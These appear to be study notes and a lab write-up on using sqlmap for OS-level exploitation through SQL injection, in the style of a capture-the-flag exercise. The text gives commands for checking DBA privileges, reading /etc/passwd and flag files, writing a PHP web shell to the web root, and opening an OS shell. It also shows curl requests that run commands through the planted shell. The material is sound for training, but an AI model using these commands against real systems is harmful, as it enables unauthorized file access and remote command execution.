SQLMap Essentials

OS Exploitation

--is-dba will check if you have DBA privilege

sqlmap -u "http://www.galapagh0st.com/case1.php?id=1" --is-dba

You do this to see if you have file read capabilities

If we have DBA privileges then we can read files.

--file-read "/etc/passwd" Will make sqlmap read files

sqlmap -u "http://www.galapagh0st.com/?id=1" --file-read "/etc/passwd"

First we must prep our file we want to write onto the server something basic might be:

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Then we can use --file-write and --file-dest to send the file to the server.

sqlmap -u "http://www.galapagh0st.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

--os-shell will allow us to execute a command

sqlmap -u "http://www.galapagh0st.com/?id=1" --os-shell

When you do this you might get an error not allowing us. If this is the case then we may want to pair it with --technique

sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

NOTE: The above technique is Error-based

Question 1: Try to read the file in /var/www/html/flag.txt

sqlmap -u "http://83.136.251.75:31122/?id=1" --file-read "/var/www/html/flag.txt"

Question 2: Build a shell and find the other flag

I built the hell from the example like so

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Then I URL encoded and ran the command find / -type f -name "*flag*" to find across the system all files with flag in the name

curl 83.136.251.75:31122/shell.php?cmd=find%20%2F%20-type%20f%20-name%20%22%2Aflag%2A%22

checked /var/www/html/flag.txt but that was the flag we already used so grabbed /flag.txt

curl 83.136.251.75:31122/shell.php?cmd=cat%20%2Fflag.txt

Got flag